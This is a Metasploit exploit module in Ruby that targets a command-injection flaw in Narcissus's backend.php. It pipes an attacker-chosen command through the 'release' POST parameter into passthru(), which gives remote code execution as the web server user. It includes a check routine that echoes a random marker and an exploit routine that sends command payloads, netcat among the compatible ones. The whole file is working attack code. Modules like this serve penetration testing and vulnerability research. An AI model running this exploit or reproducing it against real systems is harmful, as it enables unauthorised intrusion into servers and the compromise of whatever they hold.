##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

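class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata. The issue is the unsanitised 'release' POST parameter of
  # backend.php reaching passthru() (see 'Description'); the module therefore
  # only works with command ('cmd') payloads.
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Narcissus Image Configuration Passthru Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in Narcissus image configuration
        function.  This is due to the backend.php file not handling the $release parameter
        properly, and then passes it on to the configure_image() function.  In this
        function, the $release parameter can be used to inject system commands for
        passthru (a PHP function that's meant to be used to run a bash script by the
        vulnerable application), which allows remote code execution under the context
        of the web server.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Dun',    # Original
          'sinn3r'  # Metasploit
        ],
      'References'     =>
        [
          [ 'EDB', '22709' ],
          [ 'OSVDB', '87410' ]
        ],
      'Payload'        =>
        {
          # NUL, CR and LF are excluded; presumably they would end the injected
          # line before the rest of the payload is read.
          'BadChars' => "\x00\x0d\x0a",
          'Compat'         =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl ruby python netcat netcat-e'
            },
        },
      'Platform'       => %w{ linux unix },
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['Narcissus', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-11-14',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path to the web application', '/narcissus-master/'])
      ])
  end

  # Base URI of the web application, guaranteed to end with '/'.
  #
  # Works on a copy: the previous version appended '/' in place to the String
  # returned by target_uri.path, which may be the URI object's own path and
  # would then pick up another '/' on every call.
  #
  # @return [String]
  def base
    uri = target_uri.path.dup
    uri << '/' unless uri.end_with?('/')
    uri
  end

  # POST one command to backend.php via the 'release' parameter and return
  # the HTTP response.
  #
  # @param command [String] command string; it is sent prefixed with '|'
  # @return [Rex::Proto::Http::Response, nil] nil when no response was received
  def remote_exe(command)
    res = send_request_cgi({
      'uri'      => "#{base}backend.php",
      'method'   => 'POST',
      # Parameters are sent unencoded so the command reaches the server as-is.
      'encode_params' => false,
      'vars_post' => {
        'machine' => '0',
        'action'  => 'configure_image',
        'release' => "|#{command}"
      }
    })

    vprint_line(res.body) if res
    res
  end

  # Check for the flaw by echoing a random marker and looking for it in the
  # response body.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable when the marker is echoed
  #   back, Unknown when no response arrived at all (previously reported as
  #   Safe, which hid connection failures), Safe otherwise
  def check
    sig = rand_text_alpha(rand(5..14))  # marker of 5..14 letters, as before

    vprint_status("Looking for signature '#{sig}'...")
    res = remote_exe("echo #{sig}")

    unless res
      vprint_status("No response from the target")
      return Exploit::CheckCode::Unknown
    end

    # sig is alphabetic only, so a plain substring test equals the old regex
    if res.body.to_s.include?(sig)
      vprint_status("Signature '#{sig}' found.")
      Exploit::CheckCode::Vulnerable
    else
      vprint_status("Signature not found")
      Exploit::CheckCode::Safe
    end
  end

  # Send the selected command payload through the same request path as check.
  def exploit
    print_status("Sending malicious request...")
    remote_exe(payload.encoded)
  end
end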